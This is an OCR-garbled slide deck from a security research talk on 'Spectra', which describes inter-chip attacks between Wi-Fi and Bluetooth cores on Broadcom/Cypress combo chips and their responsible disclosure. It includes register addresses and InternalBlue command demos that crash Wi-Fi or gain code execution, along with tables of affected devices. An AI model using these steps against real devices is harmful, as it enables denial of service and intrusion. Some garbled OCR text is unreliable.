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When you got Bluetooth on-chip RCE... 


Matthew Green v 
@matthew_d_green 


Bluetooth, after 22 years of expensive iterative 
development, is indistinguishable from magic. 


4:02 AM - May 24, 2020 - Twitter for iPhone 


FRANKENSTEIN 

CNE-2045- 11546 
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Bluetooth REE 


35C3 Talk: https://media.ccc.de/v/35c3-9498-dissecting broadcom. bluetooth, Frankenstein Fuzzer: https://github.com/seemoo-lab/frankenstein 


...but Wi-Fi has more privileges. 


“But it’s connected via UART!” 


“Can you pop calc?” 
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Let's break inter-chip separation! 
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Spectra: SpeculativeSpectrum Transmission 


Wi-Fi, Bluetooth, and even LTE share freguencies in the 
2.4 GHz spectrum. 
Thev cause interference in small devices like smartphones. 


Wireless combo chip performance optimization: 
enhanced coexistence mechanisms. 

Observable side effects of transmission delavs and 
coordination lead to side channels. 

Attackers require code execution privileges, 


but thev can escalate between wireless cores 
without further checks bv the operating svstem. 
\ 


E Xx) 


SPECTRA 


Wireless Architecture (iOS) 


Bluetooth 


ARM CR4 
D11 Core 


Intel/Qualcomm ARM CM3/CM4 


—- Hardwired serial coexistence interfaces, inter-chip attack surface. 
--- Wireless bottom-up and app-based top-down attack surface. 


1. 


Spectra Impact 


Denial of Service 


One wireless core denies transmission 
to the other core. 


Information Disclosure 


One wireless core can infer data or 
actions of the other core. 


Code Execution 


One wireless core can execute code 
within the other core. 


Matthew Garrett 
Q @mjg59 
QUEER GHOST ATTACK 


(& Catalin Cimpanu @campuscodi : May 21 
New 'Spectra' attack breaks the separation between Wi-Fi and Bluetooth 
communications on the same device 


zdnet.com/article/new-sp... 


Broadcom: ~ 1 Billion Devices 


Apple 
o All iPhones, MacBooks, iMacs, older Apple Watches 


Samsung 
o Samsung Galaxy S and Note series in Europe 


Google 


o Only older devices, e.g., Nexus 5/6P 
Raspberry Pi 
IoT devices 

o Fitbit Ionic 


And no firmware checks. A perfect prototyping platform \o/ 


Coexistence: Escalation within the chip 
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32 kHz External LPO 


From the BCM4339 datasheet (Google Nexus 5). 
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SECI UART and GCl-GPIOs 


External output used in the evaluation baord debugging setup. 
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GCI 


WLAN RAM Sharing 


CVE-2020-10368: Information Disclosure 
CVE-2020-10367: Code Execution 


WLAN/BT Access 


GCI Coex I/F 

CVE-2019-15063: Denial of Service 
CVE-2020-10370: Denial of Service 

C CVE-2020-10369: Information Disclosure 
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BlueRF Shared LNA Control 


and Other Coex l/Fs 


CLB 


AXISAH 
Chip 
Common 
OTP 


NIC-301 AXI Backplane 
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D11 Core (MAC) 


1x1 802.11ac PHY 


2.4 GHz/5 GHz 802.11ac 
Dual-Band Radio 


FEM or SP3T 


Diplexer 


FEM or SPDT 


WL HOST WAKE 
WL DEV WAKE 
JTAG 

Other GPIOs 


SDIO 3.0 
PCle 1.1 


RF Switch Controls 


XTAL 


Product Overview 


The Cvpress CVW43XXX WLAN, CVW207XX BT, or WLAN/BT combo chips provide the highest level of integra- 
tion for wearables and other consumer/industrial embedded applications. The device includes integrated PMU, 
IEEE 802.11 MAC/baseband, radio, and Bluetooth for each combo chip. It supports all rates specified in the IEEE 
802.11a/b/g/n/ac specifications. It also supports optional antenna diversity for improved RF performance in difficult 
environments. 


An embedded wireless system-on-a-chip (SoC) CYW43907, which includes an ARM-based processor as well as 
WLAN, offers the lowest RBOM in the industry and is uniguely suited for Internet-of-Things (loT) applications. 


For the WLAN section, several alternative host interfaces are included: SDIO, SPI, and PCle depending on the 
products. For the Bluetooth section, a host interface option using high-speed 4-wire UART and PCM (Pulse-Code 
Modulation) digital audio are provided. 


In an integrated single-chip combo solution, the CVW43XXX implements highiv sophisticated enhanced collabora- 
tive coexistence hardware mechanisms and algorithms to enable the WLAN and Bluetooth to operate simultane- 
ously and to ensure maximum medium access time, high throughput, and audio quality. Collaborative coexistence 
between WLAN and Bluetooth is implemented according to IEEE 802.15.2 Packet Traffic Arbitration (PTA) and 
through Cvpress's Enhanced Coexistence Interface (ECI). ECI augments PTA signaling bv enabling exchange of 
additional information required for implementing more advanced collaborative coexistence methods. As a result, 
overall qualitv for simultaneous voice, video, and data transmission on an embedded svstem is achieved. 


Bv the wav, throughput reallv sucks with ECI disabled. Vou cannot stream a 
video with Wi-Fi and listen to it with vour Bluetooth headset. 


www.cypress.com Document No. 002-14852 Rev. *C 


AN214852 - Collaborative Coexistence Interface Between Cypress-to-Cypress Solutions and Cypress-to-third-party Chips 
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(also SECI, ECI, GCI) 


Serial Enhanced Coexistence Interface 


Separate Bluetooth (CVW20719) and 
Wi-Fi (CYW490307) boards. 


Only connection: Serial Enhanced Coexistence 
Interface (SECI). 


Separate antennas, exclude side effects! 


Debugging with logic analyzer. 


What does it look like? 


A 
Start scan Last result End scan 


32 34 36 38 4 42 44 46 48 5 52 54 56 58 6 62 64 66 68 7 
Time (s) 


a) SECI while streaming music via Bluetooth and scanning for Wi-Fi access points. 


BT | | M fe db el db 3c 
Wi-Fi [ ab 03 db 22 


3.83632445 3.83641841 
Time (s) 


b) SECI while streaming music via Bluetooth and scanning for Wi-Fi access points, zoomed in to first Wi-Fi peak. 


EE EN O N N N EG IN 
Mi Sò 
20.52 20.55 20.58 20.61 20.64 20.67 20.7 20.73 20.76 20.79 20.82 20.85 20.88 20.91 


Time (s) 


c) SECI while typing on a Bluetooth keyboard, Wi-Fi inactive. 


Denial of Service BT— Wi-Fi 


CVE-2019-15063 (reported August 2019) 


When Bluetooth writes to the gci chipcontrol register at 0x650200, 

this crashes Wi-Fi. 

We can observe a voltage drop with the logic analvzer. 

Causes a kernel panic on various devices, Wi-Fi PCle behaves reallv strange 
afterward... 


macOS Kernel Panic Demo 


@ Terminal Shell Edit View Window Help 100% ME Mon 18:57 test 


test@tests-MacBook-Pro - % internalblue 


-- > ----- talina 
EIN AA va PL Os TN =) macOS Ca 
YET AE A le AT GAT AN Zi A MEINE ETA PES 


MacBook Pro (13-inch, 2019, Two Thunderbolt 3 ports) 
type <help> for usage information! 


[x] No 105 devices connected 
CID './adb' does not exist Graphics Intel Iris Plus Graph 
(xl) No adb devices found. 

[x] Wireshark configuration (on Loopback interface): udp.port = 
= 65359 || udp.port == 65368 

[x] Connected to mac 

(x) Chip identifier: @x203a (001.000.058) 

[x] Using fw 0x203a.pv 

(x) Loaded firmware information for BCM437783. 

(e) Try to enable debugging on H4 (warning if not supported)... | 
[*] Starting commandLoop for reference <internalblue.macoscore. 
macOSCore object at 0x108777750> I 
[1] H4 Type 7 not supported by macOS Core! rom 
> writemem —hex 0x650400 ff rom 


icmp_seq=123 ttl-118 time=20.694 ms 
icmp_seq=124 ttl-118 time=22.526 ms 
icmp_seq=125 ttl-118 time=16.857 ms 
icmp_seq=126 ttl=118 time=34.848 ms 
icmp_seq=127 tt1=118 time=24.991 ms 
icmp_seq=128 ttl-118 time=172.768 ms 
icmp_seq=129 ttl-118 time=16.486 ms 
icmp. seqs130 ttl-118 time=13.610 ms 
icmp_seq=131 ttl-118 time=28.122 ms 
icmp_seq=132 ttl-118 time=20.135 ms 
icmp_seq=133 ttl-118 time=23.399 ms 
icmp. seqs134 ttl-118 time=15.319 ms 
icmp_seq=135 ttl-118 time=21.032 ms 
icmp_seq=136 ttl-118 time=48.505 ms 


icmp_seq=138 ttl-118 time=14.358 ms 
icmp_seq=139 ttl-118 time=15.345 ms 


do do do do In Do do do do do in In do In in do o 
P to o DD DOOD OO a o 
b 0000000000 0 © ww 


icmp_seq=137 ttl-118 time=49.749 ms —— 


BCM4335C0 


BCM4345B0 


Denial of Service BT— Wi-Fi 


Nexus 5 


iPhone 6 


Android 6.0.1 


¡OS 12.4 


Build Date 
Dec 11 2012 


Jul 15 2013 


0x650440, 
0x650600 


0x650000— 
0x6507ff 


Disconnects all Wi-Fi, Wi-Fi can be reconnected. 


Disables only 2.4 GHz Wi-Fi until restarting Bluetooth. 


BCM4345C0 


BCM4358A3 


BCM4358A3 


BCM4345C1 
BCM4355C0 
BCM4347B0 
BCM4347B0 


BCM4347B1 
CYW490307+ 
CVW20719 
BCM4375B1 
BCM4375B1 
BCM4377B3 


BCM4364B3 


BCM4378B1 


Raspberry Pi 3+/4 


Nexus 6P 
Samsung Galaxy S6 


iPhone SE 

iPhone 7 

Samsung Galaxy S8 
Samsung Galaxy S8 


iPhone 8/X/XR 
Evaluation Boards 


Samsung Galaxy 
S10/S10e/S10+ 


Samsung Galaxy 
$10/S10e/S10+/S20 


MacBook Pro/Air 
2019-2020 


MacBook Pro/Air 
2019-2020 


iPhone 11 


Raspbian Buster 


Android 7.1.2 


Lineage OS 14.1 


iOS 12.4-13.3.1 
iOS 12.4-13.3.1 
Android 8.0.0 

LineageOS 16.0 


iOS 12.4-13.3.1 
ThreadX+Linux 


Android 9 


Android 10 


macOS 
10.15.1-10.15.5 


macOS 
10.15.4-10.15.5 


¡OS 13.3 


Aug 19 2014 


Oct 23 2014 
Oct 23 2014 


Jan 27 2015 
Sep 14 2015 
Jun 3 2016 
Jun 3 2016 


Oct 11 2016 
Jan 17 2017 


Apr 13 2018 


Apr 13 2018 


Feb 28 2018 


May 9 2018 


Oct 25 2018 


0x650000— 
0x6507ff 


0x650000— 
0x6507ff 


0x650000— 
0x6507ff 


0x650200 
0x650200 
0x650200 
0x650200 


0x650200 
0x650200 


0x650200 


0x650200 


0x650400 


0x650600 


0x650400 


Random 


Full and partial Wi-Fi crashes, including Secure Digital Input 
Output (SDIO), abilitv to scan for Wi-Fis, speed reduction. Re- 
boot required to restore functionalitv. 


Disables all Wi-Fi until restarting Bluetooth. 
Disables all Wi-Fi until restarting Bluetooth. 


Kernel panic, resulting in a reboot. 
Kernel panic, resulting in a reboot. 
Disables all Wi-Fi, kernel panic & reboot when re-enabling it. 


Temporarilv disables all Wi-Fi, freezes svstem for a couple of 
seconds when re-enabling Wi-Fi. 


Kernel panic, resulting in a reboot. 
SECI voltage drop, only observable with the logic analvzer. 


Disables all Wi-Fi. Reboot required to re-enable Wi-Fi. 


Disables Wi-Fi until disabling Bluetooth, going to airplane 
mode, and re-enabling them. 


System freeze and panic without crash log or with x86 CPU 
CATERR detected. 


System freeze and panic without crash log or with x86 CPU 
CATERR detected. 


Kernel panic in LLC Bus error from cpul and reboot. 


Ni-Fi D11 Core 


Broadcom Wi-Fi Architecture 


Quite the same real-time architecture since 2003: 


e Initial version: Soft MAC Linux host talks directly with low level stuff. 
e Newer versions: Full MAC additional ARM core offloads almost all operations. 


Shared Memory 


RF Baseband Dsss JOFDM 
PHY [| PHY 


Host 


PETIT —— o 


E vad 


Full 
MAC 


Shared Memory 
PHY 


RF Baseband psss | OFDM 
PHY || PHY 


Since BCM94303 (2003) and BCM94318E (2006), chipset initially called Airforce One 


D11 PSM CPU 


Di1 PSM CPU 


D11 MAC Core 
D11 MAC Core 
Wi-Fi Chipset 


Wi-Fi Chipset 


Radio 
Front-end 
Radio 
Front-end 


Di1 Core: A Specialized Microcontroller 


Runs ucode, instruction set very proprietary, never seen in other architectures 


8 bytes fixed-length instructions 
three operands instructions plus very weird bit-oriented operators 
tightly connected to PHY hardware 


example from the main loop: 
jext EOI (COND RX PLCP), rx plcp // Preamble (Physical-layer convergence protocol) 
jext COND RX COMPLETE, rx complete 
jext EOI (COND RX BADPLCP), rx badplcp 
jnext  COND RX FIFOFULL, rx fifofull 


example from send response code: 


mov @x@D4, SPR TME VAL6 // ACK indicated by 0xD4 
mov 0x035, TX_TYPE_SUBTYPE 
je RX_TYPE_SUBTYPE, TS PSPOLL, pspoll frame 


Existing disassembler/assembler (customized to support later instructions) 


Michael Búsch created it back in 2007, updated since then within Nexmon. 
hints about registers from many piece of software leaked publicly. 


Public ucode tool initially released by Michael Busch in 2007 (https://bues.ch/cgit/b4 3-tools.git), continued within Nexmon (https://github.com/seemoo-lab/nexmon). 


Specialized MAC CPU 
e Controls Tx and Rx engines 


Inside the D11 Core 


o channel access scheduling, retransmission 
o filters incoming packets 

Direct access to hardware: roma ey 
o PHY registers ae 
o Radio 

o Interfaces, i.e., coexistence with Bluetooth 
Up to 64kB ucode memory 

Up to 8kB own RAM (called Shared Mem) 
Indirect access to host memory/FIFO 
Sub-us accuracy 


many interfaces, like SECI... 


Di1 Coexistence Interface (SECI) 


Quite a few registers directly accessible from D11 
a 64-bit buffer for rxing messages from Bluetooth (time indications and msg tvpel) 
o messages are 'streamed' from Bluetooth with high rate (every 1.25ms) 
e programmable timers 
one register btcx trans ctrl with two bits for telling Bluetooth 
o who has priority 
o who is controlling antenna 
o itis a grant/reject interface 


Di1 ucode (reference 43909B0 from Cypress): 
12% of the 47kB ucode for coexistence 


1° 


Jitter to Bluetooth measured with FPGA | F € 
. receive a frame, wait until the end ; Wwi-Fi#2 
e transmit a SECI message > x 
e approximately 200ns std iba PARAS UE 


Breaki ng the 
Grant/Reject Scheme 


ACL Packets 


Bluetooth Grant and Reject Counters 


Playback running, Wi-Fi disconnected, Paused 
Wi-Fi caches video, still some video buffer for Bluetooth 
Bluetooth streams audio 


Plavback started 


Plavback paused 


—— Bluetooth Reject bv Wi-Fi 
— Bluetooth Grant 


20 40 60 80 100 120 140 160 180 200 220 240 260 280 
Time (s) 


Denial of Service Wi-Fi— BT 


CVE-2020-10370 (reported March 2020) 


e When Wi-Fi is active and then stops sending SECI messages, 
Bluetooth stops transmitting packets. 


Wi-Fi ATT EE TET Pause D11 core counters Audio pauses Continue 


2.2 2.3 2.4 25 2.6 2.7 2.8 2.9 3 3.1 3.2 3.3 3.4 3.5 3.6 of 
Time (s) 


Let's take a closer look! 


20.52 20.55 20.58 20.61 20.64 20.67 20.7 20.73 20.76 20.79 20.82 20.85 20.88 20.91 
Time (s) 


c) SECI while typing on a Bluetooth keyboard, Wi-Fi inactive. 


Bluetooth keyboard connected, Wi-Fi is idle. Bluetooth sends a message every 30ms and Wi-Fi is sleeping. 
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Accurate Key Timings 


Wireshark Keypress ht at ititot =t i) ita att A HY HSE $ TOT OF OF 
Wireshark HID Data oe co O00 co .. 00 00000000 000 co © ec 9 9 9000 © 000 00 00 
SECI Keyboard db 21 db 58| ee ee ee... ee 00 00000000 COD cc © ec 00 0000 © 000 00 00 


BEL PANE SAMGO] pepa RRA AAA EN EEE RATA 


30 31 32 33 34 35 36 37 38 
Time (s) 


Keypress timings as observed on logic analyzer (e) when filtering for action db 21 db 58. SECI time resolution is indicated by 
filtering for the frame start db 03 db 22, whichis each 30 ms for the analyzed keyboard. The aligned Wireshark trace is observed 
on the host and contains the decoded keypresses in addition to the slightly inaccurate timings (e). 


Information Disclosure Side Channel 


CVE-2020-10369 (reported March 2020) 


Each Bluetooth Human Interface Device (HID) event generates a SECI message. 
HID devices exist in different event timing variants, the kevboard under test had 
30ms, but other keyboards have 12.5ms, 15ms, etc. 

SECI messages are polled every 1.25ms by the Wi-Fi Di1 core. 

The SECI message for keep alive packets is different from the SECI message 
containing a HID kevstroke. 

— Infer kevstroke timings and kevpress amounts. 


When you spent too much time looking for side channels... 
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RAM sharing??! Only one direction? 


SECI UART and GCl-GPIOs 


External output used in the evaluation baord debugging setup. 


Bluetooth Wi-Fi 


WLAN RAM Sharing 


BT HOST WAKE ti 
CVE-2020-10368: Information Disclosure WL HOST WAKE 
BT DEV WAKE à UART jet RAM CVE-2020-10367: Code Execution RAM o WL_DEV_WAKE 
UART = LUART | G 
er = 12S bal > ROM ROM 3 JTAG 
| 2 > La] ‘ora L'È 
PCM = = ARMCM3 ARM CR4 Z S Other GPIOs 
£ pi NE 
FS — WLAN WS AXISAHB 4 2 
Other GPIOs DS Chip 3 + SDIOD SDIO 3.0 
Registers 4— 3 RXITX GCI Coex I/F Common II Ġ Ed PCle PCle 1.1 
n CVE-2019-15063: Denial of Service 7 Z 
DMA > A CVE-2020-10370: Denial of Service OTP + AXIZAPB 
JTAG — n > CVE-2020-10369: Information Disclosure 
< APU D11 Core (MAC) 

[Po], BlueRF Shared LNA Control 

= and Other Coex l/Fs 1x1 802.11ac PHY RF Switch Controls 
wo dt | 

z 2.4GHz/5 GHz 802.1 1ac rom 
[Pause | BT RF Dual-Band Radio 


32 kHz External LPO 


CLB FEM or SP3T FEM or SPDT 


t24 GHz |5GHz 
From the BCM4339 datasheet (Google Nexus 5). 


Diplexer 


Where is the shared RAM? 


e Bluetooth-oniv chips with coexistence interface? 


Cypress WICED Studio contains partial symbols for CYW20719, CYW20735, 
CYW20819 including register mappings, but nothing in there. 


e Bluetooth/Wi-Fi combo chips? 
But thev also forgot the svmbols of one MacBook Pro (2016 model). 


wlan buf 4... let's go for this! 


Information Disclosure 


CVE-2020-10368 (reported March 2020) 


e Bluetooth can read information from the Wi-Fi RAM starting at register 0x680000. 
This is mapped to Wi-Fi 0x180000. This range starts with a packet buffer. 


N TODO mserd vuicorn here l 


Code Execution 


CVE-2020-10367 (reported March 2020) 


e Bluetooth can write data to the Wi-Fi RAM starting at register 0x680000. This is 
mapped to Wi-Fi 0x180000. 

e At 0x181000, Wi-Fi contains a function pointer table. 
We can gain Wi-Fi code execution on a Samsung Galaxy S10 by writing to 
@x681024 in Bluetooth. 


CONSOLE: 000288.686 THREADX TRAP INFO: 

CONSOLE: 000288.686 Thread: main thread(ID:0x54485244) run cnt:7792 

CONSOLE: 000288.686 Thread: Stack:002fff24 Start Addr:002fdff0 End Addr:002fffef Size:8192 
CONSOLE: 000288.686 Thread: Entry func:001c556d 

CONSOLE: 000288.686 Thread: Timer:0022cfcc 

CONSOLE: @00288.686 

CONSOLE: FWID @1-a4172c@ 

CONSOLE: flags 30040007 

CONSOLE: 000288.686 

CONSOLE: TRAP 3(2ffeb8): pc 67452300, lr 19b569, sp 2fff10, cpsr 68000193, spsr 68000033 
CONSOLE: @00288.686 ifsr 0, ifar 67452300 

CONSOLE: 000288.686 srpwr: 0x100b0000 clk:0xb0040 pmu:0x13e @x5fcbc7df 0x0 

CONSOLE: @00288.686 re 2e15a8, r1 2c96a4, r2 2ca298, r3 B, r4 2c9708, r5 19c46f, r6 467ae 
CONSOLE: @00288.686 r7 40, r8 28bde0, r9 29224, r10 2fdff0, r11 B, r12 67452300 
CONSOLE: 000288.686 


CONSOLE: sp+0 00000000 13d75f00 002d3a84 0028bde0 
CONSOLE: 000288.686 sp+10 00299b74 00000000 0022d084 0028bde0 
CONSOLE: 


CONSOLE: 000288.686 sp+20 0019c46f 
CONSOLE: 000288.686 sp+3c 080195355 
CONSOLE: 000288.686 sp+54 0019c46f 


OMG UK is ro tl 
MBP 2019/2020 (BCM4377) 


d Terminal Shell Edit View Window Help QO: 98%04) Mon 17:47 test Q :Z 


coexistence — internalblue — 67x38 


Every 2.0s: 1s tests-MacBook-Pro.local: Mon Jul 6 17:47:33 2020 
_ __ (2020-07-01 11,55,34.914750)-BCMWLAN Net Roam Failure-status=3, reason=4 
/ / y ME LET DA A (2020-07-01 11,55,36.8616841-BCMWLAN Net Roam Failure-status=3,reason=4 

MED. O) dI Ed. TT PELE AND 
N BAT M N. ER BARINAS RANA ANS 
type help” for usage information! 1 

[*] No iOS devices connected 

(N? './adb' does not exist DE ccadh lo 

[*] No adb devices found. A € y A 

[*] Wireshark configuration (on Loopback interface): udp.port == 62 indice code Mas di 
604 || udp.port == 62605 

[*] Connected to mac 

[*] Chip identifier: 0x203a (001.000.058) 

[*] Using fw 0x203a.pv 

[*] Loaded firmware information for BCM4377B3. 

[x] Try to enable debugging on H4 (warning if not supported)... 

[*] Starting commandLoop for reference <internalblue.macoscore.macO 
E \ SCore object at 0x107653610> 

AE [1] H4 Type 7 not supported by macOS Core! 
Mis! —» |> writeasm @x68cbfc b 0xda123456 
° (xl) Assembler was successful. Machine code (len = 20 bytes) is: 
(x) 0068cbfc 00 TO 00 b8 78 47 fd e7 04 fO 1f e5 56 34 12 da | 
EED [Vé] 
0068cc0c 00 00 00 BB 


0068cc10 
[?] Warning: Address 0x0068cbfc (len=@x14) is not inside a RAM sec 
tion. Continue? [yes/no] 


CVE-2020-10367 and -10368: A few devices... 
| A ee 


BCM4335C0 Nexus 5 Android 6.0.1 

BCM4345B0 iPhone 6 ¡OS 12.4 

BCM43430A1 Raspberry Pi 3 Raspbian Buster 

BCM4345C0 Raspberry Pi 3+/4 Raspbian Buster 

BCM4358A3 Samsung Galaxy S6, Google Nexus 6P Lineage OS 14.1 

BCM20703A2 MacBook Pro 2016 

BCM4355C0 iPhone 7 ¡OS 13.3 

BCM4347B0 Samsung Galaxy S8 Android 8.0.0 

BCM4347B1 iPhone 8/X/XR ¡OS 13.3 

BCM4375B1 Samsung Galaxy S10/S10e/S10+ Android 9 

BCM4375B1 Samsung Galaxy S10/S10e/S10+/S20 Android 10 

BCM4377B3 MacBook Pro+Air, 2019-2020 macOS Catalina 10.15.1-10.5.5 
BCM4364B3 MacBook Pro+Air, 2019-2020 macOS Catalina 10.15.4-10.5.5 
BCM4378B1 iPhone 11 IOS 13.3 


? Mentioned in datasheet but probably different mapping, did not crash in our test. 
e Likely vulnerable but no physical device available for testing. 
% Kernel panic observed on the operating system. 


Dec 11 2012 
Jul 15 2013 
Jun 2 2014 

Aug 19 2014 

Oct 23 2014 

Oct 22 2015 

Sep 14 2015 
Jun 3 2016 

Oct 11 2016 

Apr 13 2018 

Apr 13 2018 

Feb 28 2018 
May 9 2018 

Oct 25 2018 


x XX x N S&S Ss EX X 


When you have 


Every 2.0s: ls 


[2020-07-06_13,17,29. 
[2020-07-06_13,17,46. 
[2020-07-06_13,18,07. 
[2020-07-06_13,18,25. 
[2020-07-06_13,18,28. 
[2020-07-06_13,18,39. 
[2020-07-06_13,18,44. 
[2020-07-06_13,19,17. 
[2020-07-06_13,19,51. 
[2020-07-06_13,20,47. 
[2020-07-06_13,21,04. 
[2020-07-06_13,22,07. 
[2020-07-06_13,22,08. 
[2020-07-06_13,22,12. 
[2020-07-06_13,26,49. 
[2020-07-06_13,34,14. 
[2020-07-06_13,34,18. 
[2020-07-06_13,34,21. 
[2020-07-06_13,34,24. 
[2020-07-06_13,34,59. 
[2020-07-06_13,35,02. 
[2020-07-06_13,35,13. 
[2020-07-06_13,35,14. 
[2020-07-06_14,52,16. 
[2020-07-06_16,51,14. 
[2020-07-06_16,51,57. 
[2020-07-06_16,52,09. 
[2020-07-06_16,52,24. 
[2020-07-06_16,52,41. 


925442 ]=watchdog@BCMWLAN 
927561 1-watchdog@BCMWLAN 
548388 ]=watchdog@BCMWLAN 
291703 ]=watchdog@BCMWLAN 
660271 ]=watchdog@BCMWLAN 
909139 ]=watchdog@BCMWLAN 
205612 J=watchdog@BCMWLAN 
785250 J=watchdog@BCMWLAN 
322313 ]J=watchdog@BCMWLAN 
611553 ]=watchdog@BCMWLAN 
703997 ]=watchdog@BCMWLAN 
809095 ]=watchdog@BCMWLAN 


Chip 
Chip 
Chip 
Chip 
Chip 
Chip 
Chip 
Chip 
Chip 
Chip 
Chip 
Chip 


no idea what you're doing... 


/Library/Logs/CrashReporter/CoreCapture/WiFi — watch Is 


MacBook-Pro.local: Mon Jul 6 17:33:31 2020 


Trap~Type=4, PC=@x56EC6, LR=0x56EB7 
Trap~Type=4, PC=@x16DB7F , LR=@x16E093 
Trap-Type=4,PC=0x16DB7F,LR=0x16DB95 
Trap~Type=4, PC=@x8CB2, LR=@x1B2C1D 
Trap~Type=4, PC=@x16E4A7, LR=0x16E4A7 
Trap~Type=4, PC=@x1AAFC8, LR=0x3843F 
Trap~Type=4, PC=@x16E3D7, LR=0x2AAF 
Trap-Type=4,PC=0x16DB7F,LR=0x16E093 
Trap~Type=4, PC=@x16DB7F , LR=@x16E093 
Trap~Type=4, PC=@xB9836, LR=@xBAEF1 
Trap-Type=4,PC=0x16CA10,LR=0x16D2E7 
Trap-Type=4,PC=0x16DB7F,LR=0x16E093 


104307 1-BCMWLAN Core Wake Reason Unexpected~Failed to get cached FW wakeup data 
Bus Unexpected Phase Bit-phase=0,expect=1,r=249,w=0 


680043 ]=watchdog@BCMWLAN 
153053 J=watchdog@BCMWLAN 
164190 1-watchdog@BCMWLAN 
321268 1-watchdog@BCMWLAN 
571824 ]=watchdog@BCMWLAN 
782521 ]=watchdog@BCMWLAN 
115526 1-watchdog@BCMWLAN 
160704 ]=watchdog@BCMWLAN 
418129 ]=watchdog@BCMWLAN 


Chip 
Chip 
Chip 
Chip 
Chip 
Cmdr 
Chip 
Cmdr 


Trap-Type=4,PC=0x16DB7F,LR=0x16E093 

Trap~Type=4, PC=0x16E3D7, LR=0x898F 

Trap~Type=4, PC=@x16E4A7, LR=@x16E4A7 

Trap~Type=4, PC=@x16E3D7, LR=@x19DBe@D 

Trap~Type=4, PC=@x16E3D7, LR=0x5B94F 

Pending Queue Stall-cmd-WLC SET VAR: event_msgs_ext 
Trap-Type=4,PC=0x16E3D7,LR=0x898F 

Outbound Queue Stall-cmd-WLC GET. VAR: ver 


7623691-BCMWLAN Failed to Create Debug Ring- 


248124 ]=watchdog@BCMWLAN 
035242 1-watchdog@BCMWLAN 
560663 J=watchdog@BCMWLAN 
880882 ]=watchdog@BCMWLAN 
051009 ]=watchdog@BCMWLAN 
425674 ]=watchdog@BCMWLAN 


Chip 
Chip 
Chip 
Chip 
Chip 
Chip 


Trap~Type=4, PC=0x55F4D, LR=0x79353 
Trap-Type=4,PC=0x16DB7F,LR=0x16E093 
Trap-Type=4,PC=0x16DB7F,LR=0x16E093 
Trap~Type=3, PC-OXFECABEB8, LR=0x18A46B 
Trap-Type=4,PC=0x4DFA2,LR=0x8BC33 
Trap-Type-7, PC-OXB9C9E, LR=@xBA349 


(2020-07-06 16,53,04.368957 ]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x39100,LR=0x38BE1 
(2020-07-06 16,53,18.3847911-watchdog@BCMWLAN Chip Trap-Type=4,PC=0x16B104,LR=0x16B0E5 
(2020-07-06 16,53,33.2300571-watchdog@BCMWLAN Chip Trap-Type=4,PC=0x16DB7F,LR=0x16E093 


(2020-07-06 16,53,50.442298 ]=watchdog@BCMWLAN Chip Trap~Type=4, PC-0x16DB7F, LR-0x16E093 


4— 


Code EXEcJNIOn 
ou SCH 436483 


Wi-Fi code execution leads to various kernel panics 


Kernel panics captured so far: 


e Samsung Galaxy S10e on Android 9 
e iPhone 8 on ¡OS 13.3, iPhone 6 on iOS 12.4 
e ... also macOS but likely another issue in the Bluetooth driver. 


MOST STUPID FOZZER 


IOS Kernel Panic Demo 


Jiska Cpunkt 
TAI Apple ID, iCloud, iTunes 4 App Store 


W-T: Aus S 
T belore panic 


Airplane Mode 
8 Wi-Fi 
E Bluetooth 


The “Patch” 


Filter ACA Command 
Xha- alsw memory access 


afde: Ariues iniktaliżakion 
Bluetooth 


Intel/Qualcomm ARM CM3/CM4 ARM CR4 


D11 Core 


—- Hardwired serial coexistence interfaces, inter-chip attack surface. 
--- Wireless bottom-up and app-based top-down attack surface. 


Mobile Wireless Standards: Bluetooth/LTE Coexistence 


3255 9 


Bluetooth con speed in v5.2 96.9% v Q = v N 


BLUETOOTH CORE SPECIFICATION Version 5.2 | Vol 7, Part C page 3255 


Nr 
€) Bluetooth 


Wireless Coexistence Interface 2 (WCI-2) Transport Specification 


3.1.4 MWS Inactivity Duration message (Type 3) 


The MWS Inactivity Duration message is used to send the IEBUSA 


MWS INAGTIVITV DURATION signal from the MWS device to the Bluetooth AGNA 
Controller. 


The message is sent at the beginning of the MWS inactivity period. 


DURATION[0] | DURATION[1] | DURATION[2] | DURATION[3] | DURATION[4] 


Table 3.10: MWS Inactivity Duration message 


Everyone has proprietary coexistence features \o/ 


Asked Broadcom if we can also include other wireless manufacturers into the 
responsible disclosure process. 


Yes, we can :) 


Forwarded to Intel, MediaTek, Qualcomm, Texas Instruments, Marvell, NXP. 
They all mention similar coexistence interfaces in their datasheets. 


Some wireless chips do not separate wireless cores at all. 
— Not directly vulnerable to Spectra? 
Operating system based side channels might exist... 


WF: Per Kond Panic 
WE frman Disdare — - 
ĠW: th. Beda 


Blow DoS 4 WW BOE 
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% Twitter: @naehrdine, @seemoolab 


jiska@bluetooth.lol, francesco.gringoli@unibs.it 


